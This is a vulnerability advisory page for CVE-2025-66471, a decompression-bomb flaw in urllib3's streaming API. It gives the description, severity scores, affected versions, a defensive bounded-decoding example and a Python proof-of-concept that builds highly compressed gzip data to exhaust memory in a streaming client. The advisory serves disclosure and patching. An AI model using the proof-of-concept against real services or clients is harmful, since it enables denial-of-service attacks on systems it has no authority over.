Security Vulnerability Report
CVE-2025-66471 CVSS 7.5 HIGH

Published: 2025-12-05 17:16:04
Last Modified: 2025-12-10 16:10:34

Description

urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.0 and prior to 2.6.0, the Streaming API improperly handles highly compressed data. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation. The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data).
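The unbounded versus bounded decoding described above, as an added example that is not urllib3's own code: both readers pull a constructed gzip sample from a simulated socket in 512-byte pieces. The first decodes every piece in full, so a tiny piece of input can expand into a huge buffered surplus; the second caps each decompress call at the bytes the caller is still owed, using zlib's max_length and unconsumed_tail so that unprocessed input stays compressed. The class and function names are assumptions for this illustration.

```python
import gzip
import zlib

# Constructed sample input: 1 MiB of one byte shrinks to roughly 1 KiB of gzip.
SAMPLE_PLAIN = b"A" * (1024 * 1024)
SAMPLE_GZIP = gzip.compress(SAMPLE_PLAIN, compresslevel=9)


class UnboundedGzipReader:
    """Models the flaw in the description: every network read is decoded in
    full, however much it expands to, and the surplus is buffered."""

    def __init__(self, raw, net_chunk=512):
        self._raw, self._pos, self._net_chunk = raw, 0, net_chunk
        self._dec = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # gzip framing
        self._buf = b""
        self.peak_buffered = 0  # largest decompressed surplus held at one time

    def read(self, amt):
        while len(self._buf) < amt and self._pos < len(self._raw):
            piece = self._raw[self._pos:self._pos + self._net_chunk]
            self._pos += len(piece)
            self._buf += self._dec.decompress(piece)  # no limit on output size
            self.peak_buffered = max(self.peak_buffered, len(self._buf))
        out, self._buf = self._buf[:amt], self._buf[amt:]
        return out


class BoundedGzipReader(UnboundedGzipReader):
    """Decode only as much as the caller asked for; input that was not yet
    processed stays compressed in zlib's unconsumed_tail until the next call."""

    def read(self, amt):
        while len(self._buf) < amt:
            pending = self._dec.unconsumed_tail
            if not pending and self._pos < len(self._raw):
                pending = self._raw[self._pos:self._pos + self._net_chunk]
                self._pos += len(pending)
            out = self._dec.decompress(pending, max_length=amt - len(self._buf))
            if not out and not pending:  # no input left and nothing pending: EOF
                break
            self._buf += out  # empty input still flushes output the inflater held back
            self.peak_buffered = max(self.peak_buffered, len(self._buf))
        out, self._buf = self._buf[:amt], self._buf[amt:]
        return out


def drain(reader, amt=1024):
    # Read to EOF in amt-sized chunks; return (total bytes, peak buffer size).
    total = 0
    while chunk := reader.read(amt):
        total += len(chunk)
    return total, reader.peak_buffered
```

Both readers return the full 1 MiB, but only the bounded one keeps its buffer at or below the 1024 bytes requested per read.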

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:python:urllib3:*:*:*:*:*:*:*:* - VULNERABLE
urllib3 >= 1.0.0
urllib3 < 2.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
"""
CVE-2025-66471 Proof of Concept
urllib3 Streaming API Resource Exhaustion via Highly Compressed Data

Note: This PoC demonstrates the vulnerability concept. Do not use for malicious purposes.
"""
import gzip

import urllib3


def generate_highly_compressed_data():
    """
    Generate highly compressed data that will cause excessive memory allocation
    when decompressed by urllib3's streaming API.
    """
    # Create data that compresses extremely well (high compression ratio)
    original_data = b'A' * 1000000  # 1MB of repeated characters

    # Use maximum compression level
    compressed_gzip = gzip.compress(original_data, compresslevel=9)

    print(f"Original size: {len(original_data)} bytes")
    print(f"Compressed size: {len(compressed_gzip)} bytes")
    print(f"Compression ratio: {len(original_data) / len(compressed_gzip):.1f}:1")

    return compressed_gzip


def exploit_urllib3_streaming(url):
    """
    Attempt to trigger resource exhaustion through urllib3 streaming API.
    This simulates what an attacker could do by controlling the server response.
    """
    # Create a pool manager (this is what the client would use)
    http = urllib3.PoolManager()

    try:
        # Request with streaming enabled
        response = http.request('GET', url, preload_content=False, timeout=30.0)

        # Try to read in small chunks
        # The vulnerability is triggered when urllib3 decompresses the entire
        # highly compressed response in a single operation
        chunk_size = 1024
        total_read = 0
        chunks = []

        for i in range(100):  # Limit iterations for safety
            chunk = response.read(chunk_size)
            if not chunk:
                break
            chunks.append(chunk)
            total_read += len(chunk)
            print(f"Read chunk {i+1}: {len(chunk)} bytes, total: {total_read}")

        response.release_conn()
        return total_read

    except Exception as e:
        print(f"Error during streaming: {e}")
        return None


def create_malicious_server_simulation():
    """
    Simulate a malicious server response with highly compressed data.
    In a real attack scenario, the attacker would control the server.
    """
    compressed_data = generate_highly_compressed_data()

    # Manually decompress to show the expected behavior vs actual behavior
    decompressed = gzip.decompress(compressed_data)
    print(f"When fully decompressed: {len(decompressed)} bytes")
    print("This demonstrates the resource allocation issue in urllib3")

    return compressed_data


if __name__ == '__main__':
    print("=" * 60)
    print("CVE-2025-66471 - urllib3 Resource Exhaustion PoC")
    print("=" * 60)

    # Generate the malicious compressed data
    create_malicious_server_simulation()

    print("\nNote: To trigger this vulnerability, an attacker would need to:")
    print("1. Control a server that responds with highly compressed data")
    print("2. Have a victim application use urllib3's streaming API")
    print("3. The victim's application would experience high CPU/memory usage")
```

References

https://github.com/urllib3/urllib3/commit/c19571de34c47de3a766541b041637ba5f716ed7 (Patch)
https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37 (Vendor Advisory)

Additional Record Data

Status: Analyzed
Weakness: CWE-409
CVSS 4.0 Vector (Secondary): CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVSS 4.0 Score: 8.9 HIGH
CVSS 3.1 Exploitability Score: 3.9
CVSS 3.1 Impact Score: 3.6
CPE Match Criteria ID: 2196EB74-E1B9-4BD0-96B6-9477225D385D